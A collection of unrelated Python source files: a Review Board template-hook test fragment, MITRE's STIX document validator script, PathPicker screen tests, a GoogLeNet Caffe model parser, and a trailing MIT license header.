# Turn off some parts of the page, to simplify the resulting HTML
# and shorten render/parse times.
self.spy_on(get_review_request_fieldsets,
call_fake=lambda *args, **kwargs: [])
response = self.client.get(
local_site_reverse('review-request-detail',
args=[review_request.display_id]))
self.assertEqual(response.status_code, 200)
parsed_html = str(parse_html(response.content.decode('utf-8')))
self.assertIn(
'<div class="review-request-body">\n'
'[before-review-request-summary here]',
parsed_html)
self.assertIn(
'<div class="review-request-section review-request-summary">\n'
'[review-request-summary-pre here]',
parsed_html)
self.assertIn(
'</time>\n</p>[review-request-summary-post here]\n</div>',
parsed_html)
self.assertIn(
'[before-review-request-fields here]'
'<table class="review-request-section"'
' id="review-request-details">',
parsed_html)
self.assertIn(
'</div>'
'[after-review-request-fields here] '
'[before-review-request-extra-panes here]'
'<div id="review-request-extra">\n'
'[review-request-extra-panes-pre here]',
parsed_html)
self.assertIn(
'</div>[review-request-extra-panes-post here]\n'
'</div>[after-review-request-extra-panes here]\n'
'</div>',
parsed_html)
|
|
#!/usr/bin/env python
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
'''
STIX Document Validator (sdv) - validates STIX v1.1.1 instance documents.
'''
import sys
import os
import logging
import argparse
import json
import settings
from validators import (STIXSchemaValidator, STIXProfileValidator,
STIXBestPracticeValidator)
__version__ = "1.1.1.2"
QUIET_OUTPUT = False
EXIT_SUCCESS = 0
EXIT_FAILURE = 1
class ValidationOptions(object):
"""Collection of validation options which can be set via command line.
Attributes:
schema_validate: True if XML Schema validation should be performed.
use_schemaloc: True if the XML Schema validation process should look
at the xsi:schemaLocation attribute to find schemas to validate
against.
stix_version: The version of STIX which should be validated against.
profile_validate: True if profile validation should be performed.
best_practice_validate: True if STIX best practice validation should
be performed.
profile_convert: True if a STIX Profile should be converted into
schematron or xslt.
xslt_out: The filename for the output profile xslt.
schematron_out: The filename for the output profile schematron.
json_results: True if results should be printed in JSON format.
quiet_output: True if only results and fatal errors should be printed
to stdout/stderr.
in_files: A list of input files and directories of files to be
validated.
in_profile: A filename/path for a STIX Profile to validate against or
convert.
"""
def __init__(self):
# validation options
self.schema_validate = False
self.use_schemaloc = False
self.stix_version = None
self.profile_validate = False
self.best_practice_validate = False
# conversion options
self.profile_convert = False
self.xslt_out = None
self.schematron_out = None
# output options
self.json_results = False
self.quiet_output = False
# input options
self.in_files = None
self.in_profile = None
# self.in_schemas = None # Not supported yet.
class ValidationResults(object):
"""Stores validation results for given file.
Args:
fn: The filename/path for the file that was validated.
Attributes:
fn: The filename/path for the file that was validated.
schema_results: XML schema validation results.
best_practice_results: STIX Best Practice validation results.
profile_resutls: STIX Profile validation results.
"""
def __init__(self, fn=None):
self.fn = fn
self.schema_results = None
self.best_practice_results = None
self.profile_results = None
class ArgumentError(Exception):
"""An exception to be raised when invalid or incompatible arguments are
passed into the application via the command line.
Args:
show_help (bool): If true, the help/usage information should be printed
to the screen.
Attributes:
show_help (bool): If true, the help/usage information should be printed
to the screen.
"""
def __init__(self, msg=None, show_help=False):
super(ArgumentError, self).__init__(msg)
self.show_help = show_help
class SchemaInvalidError(Exception):
"""Exception to be raised when schema validation fails for a given
STIX document.
Attributes:
results (dict): A dictionary of schema validation results.
"""
def __init__(self, msg=None, results=None):
super(SchemaInvalidError, self).__init__(msg)
self.results = results
def _error(msg):
"""Prints a message to the stderr prepended by '[!]'.
Args:
msg: The error message to print.
"""
sys.stderr.write("\n[!] %s\n" % str(msg))
exit(EXIT_FAILURE)
def _info(msg):
"""Prints a message to stdout, prepended by '[-]'.
Note:
If the application is running in "Quiet Mode"
(i.e., ``QUIET_OUTPUT == True``), this function will return
immediately and no message will be printed.
Args:
msg: The message to print.
"""
if QUIET_OUTPUT:
return
print "[-] %s" % msg
def _print_level(fmt, level, *args):
"""Prints a formatted message to stdout prepended by spaces. Useful for
printing hierarchical information, like bullet lists.
Args:
fmt (str): A Python formatted string.
level (int): Used to determing how many spaces to print. The formula
is ``' ' * level ``.
*args: Variable length list of arguments. Values are plugged into the
format string.
Examples:
>>> _print_level("%s", 0, "TEST")
TEST
>>> _print_level("%s", 1, "TEST")
TEST
>>> _print_level("%s", 2, "TEST")
TEST
"""
msg = fmt % args
spaces = ' ' * level
print "%s%s" % (spaces, msg)
def _get_dir_files(dir_):
"""Finds all the XML files under a directory.
Returns:
A list of file paths
"""
files = []
for fn in os.listdir(dir_):
if fn.endswith('.xml'):
fp = os.path.join(dir_, fn)
files.append(fp)
return files
def _get_files_to_validate(options):
"""Returns a list of files to validate.
Returns:
A list of filenames. An empty list if `options` does not have
``in_filea`` set.
"""
files = options.in_files
if not files:
return []
to_validate = []
for fn in files:
if os.path.isdir(fn):
children = _get_dir_files(fn)
to_validate.extend(children)
else:
to_validate.append(fn)
return to_validate
def _set_output_level(options):
"""Set the output level for the application.
If the ``quiet_output`` or ``json_results`` attributes are set on `options`
then the application does not print informational messages to stdout; only
results or fatal errors are printed to stdout.
"""
global QUIET_OUTPUT
QUIET_OUTPUT = options.quiet_output or options.json_results
def _print_schema_results(fn, results):
"""Prints STIX Schema validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
if results['result']:
_print_level("[+] XML schema validation results: %s : VALID", 0, fn)
else:
_print_level("[!] XML schema validation results: %s : INVALID", 0, fn)
_print_level("[!] Validation errors", 0)
for error in results.get("errors", []):
_print_level("[!] %s", 1, error)
def _print_best_practice_results(fn, results):
"""Prints STIX Best Practice validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
if results['result']:
print "[+] Best Practice validation results: %s : VALID" % fn
else:
_print_level("[!] Best Practice validation results: %s : INVALID",
0, fn)
_print_level("[!] Best Practice warnings", 0)
if 'fatal' in results:
_print_level("[!] Fatal error occurred processing best practices: "
"%s", 1, results['fatal'])
return
warnings = results.get('warnings', {})
root_element = warnings.get('root_element')
if root_element:
_print_level("[#] Root element not STIX_Package: [%s]", 1,
root_element['tag'])
duplicate_ids = warnings.get('duplicate_ids')
if duplicate_ids:
_print_level("[#] Nodes with duplicate ids", 1)
for id_, list_nodes in duplicate_ids.iteritems():
_print_level("[~] id: [%s]", 2, id_)
for node in list_nodes:
_print_level("[%s] line: [%s]", 3, node['tag'],
node['line_number'])
missing_ids = warnings.get('missing_ids')
if missing_ids:
_print_level("[#] Nodes with missing ids", 1)
for node in missing_ids:
_print_level("[~] [%s] line: [%s]", 2, node['tag'],
node['line_number'])
unresolved_idrefs = warnings.get('unresolved_idrefs')
if unresolved_idrefs:
_print_level("[#] Nodes with idrefs that do not resolve", 1)
for node in unresolved_idrefs:
_print_level("[~] [%s] idref: [%s] line: [%s]", 2, node['tag'],
node['idref'], node['line_number'])
formatted_ids = warnings.get('id_format')
if formatted_ids:
_print_level("[#] Nodes with ids not formatted as [ns_prefix]:"
"[object-type]-[GUID]", 1)
for node in formatted_ids:
_print_level("[~] [%s] id: [%s] line: [%s]", 2, node['tag'],
node['id'], node['line_number'])
idrefs_with_content = warnings.get('idref_with_content')
if idrefs_with_content:
_print_level("[#] Nodes that declare idrefs but also contain "
"content", 1)
for node in idrefs_with_content:
_print_level("[~] [%s] idref: [%s] line: [%s]", 2, node['tag'],
node['idref'], node['line_number'])
indicator_suggestions = warnings.get('indicator_suggestions')
if indicator_suggestions:
_print_level("[#] Indicator suggestions", 1)
for node in indicator_suggestions:
_print_level("[~] id: [%s] line: [%s] missing: %s", 2,
node['id'], node['line_number'],
node.get('missing'))
missing_titles = warnings.get('missing_titles')
if missing_titles:
_print_level("[#] Missing Titles", 1)
for node in missing_titles:
_print_level("[~] [%s] id: [%s] line: [%s]", 2,
node['tag'], node['id'], node['line_number'])
marking_control_xpath_issues = warnings.get('marking_control_xpath_issues')
if marking_control_xpath_issues:
_print_level("[#] Controlled Structure XPath Issues", 1)
for node in marking_control_xpath_issues:
_print_level("[~] line: [%s]\tissue: %s", 2,
node['line_number'], node['problem'])
vocab_suggestions = warnings.get('vocab_suggestions')
if vocab_suggestions:
_print_level("[#] Vocab suggestions", 1)
for node in vocab_suggestions:
_print_level("[~] vocab: [%s] line: [%s] version used: [%s] version suggested: [%s]", 2,
node['out_of_date'], node['line_number'],
node['given_version'],
node.get('newest_version', "???"))
def _print_profile_results(fn, results):
"""Prints STIX Profile validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
report = results.get('report', {})
errors = report.get('errors')
if not errors:
_print_level("[+] Profile validation results: %s : VALID", 0, fn)
else:
_print_level("[!] Profile validation results: %s : INVALID", 0, fn)
_print_level("[!] Profile Errors", 0)
for error in sorted(errors, key=lambda x: x['error']):
msg = error.get('error')
line_numbers = error['line_numbers']
line_numbers.sort()
_print_level("[!] %s [%s]", 1, msg, ', '.join(line_numbers))
def _print_json_results(results):
"""Prints `results` to stdout in JSON format.
Args:
results: An instance of ``ValidationResults`` which contains the
results to print.
"""
json_results = {}
for fn, result in results.iteritems():
d = {}
if result.schema_results:
d['schema_validation'] = result.schema_results
if result.profile_results:
d['profile_results'] = result.profile_results
if result.best_practice_results:
d['best_practice_results'] = result.best_practice_results
json_results[fn] = d
print json.dumps(json_results)
def _print_results(results, options):
"""Prints `results` to stdout. If ``options.json_output`` is set, the
results are printed in JSON format.
Args:
results: An instance of ``ValidationResults`` which contains the
results to print.
options: An instance of ``ValidationOptions`` which contains output
options.
"""
if options.json_results:
_print_json_results(results)
return
for fn, result in results.iteritems():
if result.schema_results:
_print_schema_results(fn, result.schema_results)
if result.best_practice_results:
_print_best_practice_results(fn, result.best_practice_results)
if result.profile_results:
_print_profile_results(fn, result.profile_results)
def _convert_profile(validator, options):
"""Converts a STIX Profile to XSLT and/or Schematron formats.
This converts a STIX Profile document and writes the results to output
schematron and/or xslt files to the output file names.
The output file names are defined by
``output.xslt_out`` and ``options.schematron_out``.
Args:
validator: An instance of STIXProfileValidator
options: ValidationOptions intance with validation options for this
validation run.
"""
xslt = validator.get_xslt()
schematron = validator.get_schematron()
schematron_out_fn = options.schematron_out
xslt_out_fn = options.xslt_out
if schematron_out_fn:
_info("Writing schematron conversion of profile to %s" %
schematron_out_fn)
schematron.write(schematron_out_fn, pretty_print=True,
xml_declaration=True, encoding="UTF-8")
if xslt_out_fn:
_info("Writing xslt conversion of profile to %s" % xslt_out_fn)
xslt.write(xslt_out_fn, pretty_print=True, xml_declaration=True,
encoding="UTF-8")
def _schema_validate(validator, fn, options):
"""Performs STIX XML Schema validation against the input filename.
Args:
validator: An instance of validators.STIXSchemaValidator
fn: A filename for a STIX document
options: ValidationOptions instance with validation options for this
validation run.
Returns:
A dictionary of validation results
"""
_info("Performing xml schema validation on %s" % fn)
results = validator.validate(fn, version=options.stix_version,
schemaloc=options.use_schemaloc)
is_valid = results['result']
if not is_valid:
raise SchemaInvalidError(results=results)
return results
def _best_practice_validate(validator, fn, options):
"""Performs STIX Best Practice validation against the input filename.
Args:
validator: An instance of STIXBestPracticeValidator
fn: A filename for a STIX document
options: ValidationOptions instance with validation options for
this validation run.
Returns:
A dictionary of validation results
"""
_info("Performing best practice validation on %s" % fn)
results = validator.validate(fn, version=options.stix_version)
return results
def _profile_validate(validator, fn):
"""Performs STIX Profile validation against the input filename.
Args:
fn: A filename for a STIX document
Returns:
A dictionary of validation results
"""
_info("Performing profile validation on %s" % fn)
results = validator.validate(fn)
return results
def _get_schema_validator(options):
"""Initializes a ``STIXSchemaValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXSchemaValidator``
"""
if options.schema_validate:
return STIXSchemaValidator(schemas=settings.SCHEMAS)
return None
def _get_profile_validator(options):
"""Initializes a ``STIXProfileValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXProfileValidator``
"""
if any((options.profile_validate, options.profile_convert)):
return STIXProfileValidator(options.in_profile)
return None
def _get_best_practice_validator(options):
"""Initializes a ``STIXBestPracticeValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXBestPracticeValidator``
"""
if options.best_practice_validate:
return STIXBestPracticeValidator()
return None
def _validate_file(fn, schema_validator, profile_validator,
best_practice_validator, options):
results = ValidationResults(fn)
try:
if schema_validator:
results.schema_results = _schema_validate(schema_validator, fn,
options)
if best_practice_validator:
results.best_practice_results = \
_best_practice_validate(best_practice_validator, fn, options)
if profile_validator:
results.profile_results = _profile_validate(profile_validator, fn)
except SchemaInvalidError as ex:
results.schema_results = ex.results
if any((profile_validator, best_practice_validator)):
msg = ("File %s was schema-invalid. No other validation will be "
"performed." % fn)
_info(msg)
return results
def _validate(options):
"""Validates files based on command line options.
Args:
options: An instance of ``ValidationOptions`` containing options for
this validation run.
"""
files = _get_files_to_validate(options)
schema_validator = _get_schema_validator(options)
profile_validator = _get_profile_validator(options)
best_practice_validator = _get_best_practice_validator(options)
results = {}
for fn in files:
result = _validate_file(fn, schema_validator, profile_validator,
best_practice_validator, options)
results[fn] = result
_print_results(results, options)
if options.profile_convert:
_convert_profile(profile_validator, options)
def _set_validation_options(args):
"""Populates an instance of ``ValidationOptions`` from the `args` param.
Args:
args (argparse.Namespace): The arguments parsed and returned from
ArgumentParser.parse_args().
Returns:
Instance of ``ValidationOptions``.
"""
options = ValidationOptions()
if (args.files and any((settings.SCHEMAS, args.use_schemaloc))):
options.schema_validate = True
if options.schema_validate and args.profile:
options.profile_validate = True
if args.profile and any((args.schematron, args.xslt)):
options.profile_convert = True
# best practice options
options.best_practice_validate = args.best_practices
# input options
options.stix_version = args.stix_version
options.in_files = args.files
options.in_profile = args.profile
# output options
options.xslt_out = args.xslt
options.schematron_out = args.schematron
options.json_results = args.json
options.quiet_output = args.quiet
return options
def _validate_args(args):
"""Checks that valid and compatible command line arguments were passed into
the application.
Args:
args (argparse.Namespace): The arguments parsed and returned from
ArgumentParser.parse_args().
Raises:
ArgumentError: If invalid or incompatible command line arguments were
passed into the application.
"""
schema_validate = False
profile_validate = False
profile_convert = False
if len(sys.argv) == 1:
raise ArgumentError("Invalid arguments", show_help=True)
if (args.files and any((settings.SCHEMAS, args.use_schemaloc))):
schema_validate = True
if schema_validate and args.profile:
profile_validate = True
if args.profile and any((args.schematron, args.xslt)):
profile_convert = True
if all((args.stix_version, args.use_schemaloc)):
raise ArgumentError("Cannot set both --stix-version and "
"--use-schemalocs")
if any((args.xslt, args.schematron)) and not args.profile:
raise ArgumentError("Profile filename is required when profile "
"conversion options are set.")
if (args.files and not any((settings.SCHEMAS, args.use_schemaloc))):
raise ArgumentError("Must provide either --use-schemaloc or "
"settings.SCHEMAS when --input-file or input-dir "
"declared")
if (args.profile and not any((profile_validate, profile_convert))):
raise ArgumentError("Profile specified but no conversion options or "
"validation options specified")
def _get_arg_parser():
"""Initializes and returns an argparse.ArgumentParser instance for this
application.
Returns:
Instance of ``argparse.ArgumentParser``
"""
parser = argparse.ArgumentParser(description="STIX Document Validator v%s"
% __version__)
parser.add_argument("--stix-version", dest="stix_version", default=None,
help="The version of STIX to validate against")
parser.add_argument("--use-schemaloc", dest="use_schemaloc",
action='store_true', default=False, help="Use "
"schemaLocation attribute to determine schema "
"locations.")
parser.add_argument("--best-practices", dest="best_practices",
action='store_true', default=False,
help="Check that the document follows authoring "
"best practices")
parser.add_argument("--profile", dest="profile", default=None,
help="Path to STIX profile in excel")
parser.add_argument("--schematron-out", dest="schematron", default=None,
help="Path to converted STIX profile schematron file "
"output.")
parser.add_argument("--xslt-out", dest="xslt", default=None,
help="Path to converted STIX profile schematron xslt "
"output.")
parser.add_argument("--quiet", dest="quiet", action="store_true",
default=False, help="Only print results and errors if "
"they occur.")
parser.add_argument("--json-results", dest="json", action="store_true",
default=False, help="Print results as raw JSON. This "
"also sets --quiet.")
parser.add_argument("files", metavar="FILES", nargs="*",
help="A whitespace separated list of STIX files or "
"directories of STIX files to validate.")
return parser
def main():
"""Entry point for sdv.py.
Parses and validates command line arguments and then does at least one of
the following:
* Validates instance document against schema/best practices/profile and
prints results to stdout.
* Converts a STIX profile into xslt and/or schematron formats
* Prints an error to stderr and exit(1)
"""
parser = _get_arg_parser()
args = parser.parse_args()
try:
_validate_args(args)
options = _set_validation_options(args)
_set_output_level(options)
_validate(options)
except ArgumentError as ex:
if ex.show_help:
parser.print_help()
_error(ex)
except Exception:
logging.exception("Fatal error occurred")
sys.exit(EXIT_FAILURE)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
from __future__ import print_function
import sys
sys.path.insert(0, '../')
import unittest
import os
import screenTestRunner
EXPECTED_DIR = './expected/'
screenTestCases = [{
'name': 'simpleLoadAndQuit',
}, {
'name': 'tallLoadAndQuit',
'screenConfig': {
'maxX': 140,
'maxY': 60,
},
}, {
'name': 'selectFirst',
'inputs': ['f'],
}, {
'name': 'selectFirstWithDown',
'inputs': ['F'],
}, {
'name': 'selectDownSelect',
'inputs': ['f', 'j', 'f'],
}, {
'name': 'selectWithDownSelect',
'inputs': ['F', 'f'],
}, {
'name': 'selectDownSelectInverse',
'inputs': ['f', 'j', 'f', 'A'],
}, {
'name': 'selectWithDownSelectInverse',
'inputs': ['F', 'F', 'A'],
}, {
'name': 'selectTwoCommandMode',
'input': 'absoluteGitDiff.txt',
'inputs': ['f', 'j', 'f', 'c'],
'pastScreen': 3
}, {
'name': 'selectCommandWithPassedCommand',
'input': 'absoluteGitDiff.txt',
# the last key "a" is so we quit from command mode
# after seeing the warning
'withAttributes': True,
'inputs': ['f', 'c', 'a'],
'pastScreen': 1,
'args': ["-c 'git add'"]
}, {
'name': 'simpleWithAttributes',
'withAttributes': True
}, {
'name': 'simpleSelectWithAttributes',
'withAttributes': True,
'inputs': ['f', 'j'],
}, {
'name': 'simpleSelectWithColor',
'input': 'gitDiffColor.txt',
'withAttributes': True,
'inputs': ['f', 'j'],
'screenConfig': {
'maxX': 200,
'maxY': 40,
},
}, {
'name': 'gitDiffWithScroll',
'input': 'gitDiffNoStat.txt',
'inputs': ['f', 'j'],
}, {
'name': 'gitDiffWithScrollUp',
'input': 'gitLongDiff.txt',
'inputs': ['k', 'k'],
}, {
'name': 'gitDiffWithPageDown',
'input': 'gitLongDiff.txt',
'inputs': [' ', ' '],
}, {
'name': 'gitDiffWithPageDownColor',
'input': 'gitLongDiffColor.txt',
'inputs': [' ', ' '],
'withAttributes': True,
}, {
'name': 'gitDiffWithValidation',
'input': 'gitDiffSomeExist.txt',
'validateFileExists': True,
'withAttributes': True,
}, {
'name': 'longFileNames',
'input': 'longFileNames.txt',
'validateFileExists': False,
'withAttributes': False,
'screenConfig': {
'maxX': 20,
'maxY': 30,
}
}, {
'name': 'dontWipeChrome',
'input': 'gitDiffColor.txt',
'withAttributes': True,
'validatesFileExists': False,
'inputs': ['DOWN', 'f', 'f', 'f', 'UP'],
'screenConfig': {
'maxX': 201,
'maxY': 40
},
'pastScreens': [0, 1, 2, 3, 4]
}, {
'name': 'longFileTruncation',
'input': 'superLongFileNames.txt',
'withAttributes': True,
'inputs': ['DOWN', 'f'],
'screenConfig': {
'maxX': 60,
'maxY': 20
},
}, {
'name': 'xModeWithSelect',
'input': 'gitDiff.txt',
'withAttributes': True,
'inputs': ['x', 'E', 'H'],
}, {
'name': 'gitAbbreivatedFiles',
'input': 'gitAbbreviatedFiles.txt',
'withAttributes': True,
'inputs': ['f', 'j'],
}]
class TestScreenLogic(unittest.TestCase):
def testScreenInputs(self):
seenCases = {}
for testCase in screenTestCases:
# make sure its not copy pasta-ed
testName = testCase['name']
self.assertFalse(
seenCases.get(testName, False), 'Already seen %s ' % testName)
seenCases[testName] = True
charInputs = ['q'] # we always quit at the end
charInputs = testCase.get('inputs', []) + charInputs
screenData = screenTestRunner.getRowsFromScreenRun(
inputFile=testCase.get('input', 'gitDiff.txt'),
charInputs=charInputs,
screenConfig=testCase.get('screenConfig', {}),
printScreen=False,
pastScreen=testCase.get('pastScreen', None),
pastScreens=testCase.get('pastScreens', None),
args=testCase.get('args', []),
validateFileExists=testCase.get('validateFileExists', False)
)
self.compareToExpected(testCase, testName, screenData)
print('Tested %s ' % testName)
def compareToExpected(self, testCase, testName, screenData):
TestScreenLogic.maybeMakeExpectedDir()
(actualLines, actualAttributes) = screenData
if testCase.get('withAttributes', False):
self.compareLinesAndAttributesToExpected(testName, screenData)
else:
self.compareLinesToExpected(testName, actualLines)
def compareLinesAndAttributesToExpected(self, testName, screenData):
(actualLines, actualAttributes) = screenData
actualMergedLines = []
for actualLine, attributeLine in zip(actualLines, actualAttributes):
actualMergedLines.append(actualLine)
actualMergedLines.append(attributeLine)
self.outputIfNotFile(testName, '\n'.join(actualMergedLines))
file = open(TestScreenLogic.getExpectedFile(testName))
expectedMergedLines = file.read().split('\n')
file.close()
self.assertEqualLines(testName, actualMergedLines, expectedMergedLines)
def compareLinesToExpected(self, testName, actualLines):
self.outputIfNotFile(testName, '\n'.join(actualLines))
file = open(TestScreenLogic.getExpectedFile(testName))
expectedLines = file.read().split('\n')
file.close()
self.assertEqualLines(testName, actualLines, expectedLines)
def outputIfNotFile(self, testName, output):
expectedFile = TestScreenLogic.getExpectedFile(testName)
if os.path.isfile(expectedFile):
return
print('Could not find file %s so outputting...' % expectedFile)
file = open(expectedFile, 'w')
file.write(output)
file.close()
self.fail(
'File outputted, please inspect %s for correctness' % expectedFile)
def assertEqualNumLines(self, testName, actualLines, expectedLines):
self.assertEqual(
len(actualLines),
len(expectedLines),
'%s test: Actual lines was %d but expected lines was %d' % (
testName, len(actualLines), len(expectedLines)),
)
def assertEqualLines(self, testName, actualLines, expectedLines):
self.assertEqualNumLines(testName, actualLines, expectedLines)
expectedFile = TestScreenLogic.getExpectedFile(testName)
for index, expectedLine in enumerate(expectedLines):
actualLine = actualLines[index]
self.assertEqual(
expectedLine,
actualLine,
'Lines did not match for test %s:\n\nExpected:"%s"\nActual :"%s"' % (
expectedFile, expectedLine, actualLine),
)
@staticmethod
def getExpectedFile(testName):
return os.path.join(EXPECTED_DIR, testName + '.txt')
@staticmethod
def maybeMakeExpectedDir():
if not os.path.isdir(EXPECTED_DIR):
os.makedirs(EXPECTED_DIR)
if __name__ == '__main__':
unittest.main()
|
|
"""Parser for bvlc caffe googlenet."""
# Authors: Michael Eickenberg
# Kyle Kastner
# License: BSD 3 Clause
from sklearn.externals import joblib
from ...datasets import get_dataset_dir, download
from .caffemodel import _parse_caffe_model, parse_caffe_model
import os
from ...utils import check_tensor, get_minibatch_indices
from .googlenet_class_labels import get_googlenet_class_label
from .googlenet_layer_names import get_googlenet_layer_names
from sklearn.base import BaseEstimator, TransformerMixin
import theano
import numpy as np
GOOGLENET_PATH = get_dataset_dir("caffe/bvlc_googlenet")
def fetch_googlenet_protobuffer_file(caffemodel_file=None):
"""Checks for existence of caffemodel protobuffer.
Downloads it if it cannot be found."""
default_filename = os.path.join(GOOGLENET_PATH,
"bvlc_googlenet.caffemodel")
if caffemodel_file is not None:
if os.path.exists(caffemodel_file):
return caffemodel_file
else:
if os.path.exists(default_filename):
import warnings
warnings.warn('Did not find %s, but found and returned %s.' %
(caffemodel_file, default_filename))
return default_filename
else:
if os.path.exists(default_filename):
return default_filename
# We didn't find the file, let's download it. To the specified location
# if specified, otherwise to the default place
if caffemodel_file is None:
caffemodel_file = default_filename
if not os.path.exists(GOOGLENET_PATH):
os.makedirs(GOOGLENET_PATH)
url = "https://dl.dropboxusercontent.com/u/15378192/"
url += "bvlc_googlenet.caffemodel"
download(url, caffemodel_file, progress_update_percentage=1)
return caffemodel_file
def fetch_googlenet_architecture(caffemodel_parsed=None,
caffemodel_protobuffer=None):
"""Fetch a pickled version of the caffe model, represented as list of
dictionaries."""
default_filename = os.path.join(GOOGLENET_PATH, 'bvlc_googlenet.pickle')
if caffemodel_parsed is not None:
if os.path.exists(caffemodel_parsed):
return joblib.load(caffemodel_parsed)
else:
if os.path.exists(default_filename):
import warnings
warnings.warn('Did not find %s, but found %s. Loading it.' %
(caffemodel_parsed, default_filename))
return joblib.load(default_filename)
else:
if os.path.exists(default_filename):
return joblib.load(default_filename)
# We didn't find the file: let's create it by parsing the protobuffer
protobuf_file = fetch_googlenet_protobuffer_file(caffemodel_protobuffer)
model = _parse_caffe_model(protobuf_file)
if caffemodel_parsed is not None:
joblib.dump(model, caffemodel_parsed)
else:
joblib.dump(model, default_filename)
return model
def create_theano_expressions(model=None, verbose=0):
if model is None:
model = fetch_googlenet_architecture()
layers, blobs, inputs, params = parse_caffe_model(model, verbose=verbose)
data_input = inputs['data']
return blobs, data_input
def _get_fprop(output_layers=('loss3/loss3',), model=None, verbose=0):
if model is None:
model = fetch_googlenet_architecture(model)
expressions, input_data = create_theano_expressions(model,
verbose=verbose)
to_compile = [expressions[expr] for expr in output_layers]
return theano.function([input_data], to_compile)
class GoogLeNetTransformer(BaseEstimator, TransformerMixin):
"""
A transformer/feature extractor for images using GoogLeNet.
Parameters
----------
output_layers : iterable, optional (default=('loss3/classifier',))
Which layers to return. Can be used to retrieve multiple levels of
output with a single call to transform.
force_reshape : boolean, optional (default=True)
Whether or not to force the output to be two dimensional. If true,
this class can be used as part of a scikit-learn pipeline.
force_reshape currently only supports len(output_layers) == 1!
batch_size: int, optional (default=None)
Size of the minibatches to process. Setting this number can reduce
memory consumption or allow for processing of out-of-core data
such as HDF5 or numpy memmap files.
Default of None corresponds to no minibatches. This should
be faster but consumes more memory.
"""
layer_names = get_googlenet_layer_names()
def __init__(self, output_layers=('loss3/classifier',),
force_reshape=True, batch_size=None,
transpose_order=(0, 3, 1, 2)):
self.output_layers = output_layers
self.force_reshape = force_reshape
self.batch_size = batch_size
self.transpose_order = transpose_order
self.transform_function = _get_fprop(output_layers)
def fit(self, X, y):
"""Passthrough function for sklearn compatibility"""
pass
def transform(self, X):
"""
Transform a set of images.
Returns the features from each layer.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, n_features]
If force_reshape = False,
list of array-like, length output_layers,
each shape = [n_images, n_channels,
n_features]
Returns the features extracted for each of the n_images in X.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
def output(X):
if self.force_reshape:
return self.transform_function(X.transpose(
*self.transpose_order))[0].reshape((len(X), -1))
else:
return self.transform_function(X.transpose(
*self.transpose_order))
if self.batch_size is not None:
res = [output(X[i:j]) for i, j in get_minibatch_indices(
X, self.batch_size)]
if self.force_reshape is False:
# Need to stick layer outputs together before stacking...
return [np.vstack([res[i][idx] for i in range(len(res))])
for idx in range(len(res[0]))]
else:
return np.vstack(res)
else:
return output(X)
class GoogLeNetClassifier(BaseEstimator):
"""
A classifier for cropped images using the GoogLeNet neural network.
Image will be cropped to center 224x224 pixels
Parameters
----------
top_n : integer, optional (default=5)
How many classes to return, based on sorted class probabilities.
output_strings : boolean, optional (default=True)
Whether to return class strings or integer classes. Returns class
strings by default.
Attributes
----------
crop_bounds_ : tuple, (x_left, x_right, y_lower, y_upper)
The coordinate boundaries of the cropping box used.
"""
min_size = (224, 224)
layer_names = get_googlenet_layer_names()
def __init__(self, top_n=5, large_network=False, output_strings=True,
transpose_order=(0, 3, 1, 2)):
self.top_n = top_n
self.large_network = large_network
self.output_strings = output_strings
self.transpose_order = transpose_order
self.transform_function = _get_fprop(('loss3/loss3',))
def fit(self, X, y=None):
"""Passthrough for scikit-learn pipeline compatibility."""
return self
def _predict_proba(self, X):
x_midpoint = X.shape[2] // 2
y_midpoint = X.shape[1] // 2
x_lower_bound = x_midpoint - self.min_size[0] // 2
if x_lower_bound <= 0:
x_lower_bound = 0
x_upper_bound = x_lower_bound + self.min_size[0]
y_lower_bound = y_midpoint - self.min_size[1] // 2
if y_lower_bound <= 0:
y_lower_bound = 0
y_upper_bound = y_lower_bound + self.min_size[1]
self.crop_bounds_ = (x_lower_bound, x_upper_bound, y_lower_bound,
y_upper_bound)
res = self.transform_function(
X[:, y_lower_bound:y_upper_bound,
x_lower_bound:x_upper_bound, :].transpose(
*self.transpose_order))[0]
return res
def predict(self, X):
"""
Classify a set of cropped input images.
Returns the top_n classes.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, top_n]
Returns the top_n classes for each of the n_images in X.
If output_strings is True, then the result will be string
description of the class label.
Otherwise, the returned values will be the integer class label.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
res = self._predict_proba(X)[:, :, 0, 0]
indices = np.argsort(res, axis=1)
indices = indices[:, -self.top_n:]
if self.output_strings:
class_strings = np.empty_like(indices,
dtype=object)
for index, value in enumerate(indices.flat):
class_strings.flat[index] = get_googlenet_class_label(value)
return class_strings
else:
return indices
def predict_proba(self, X):
"""
Prediction probability for a set of cropped input images.
Returns the top_n probabilities.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, top_n]
Returns the top_n probabilities for each of the n_images in X.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
res = self._predict_proba(X)[:, :, 0, 0]
return np.sort(res, axis=1)[:, -self.top_n:]
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
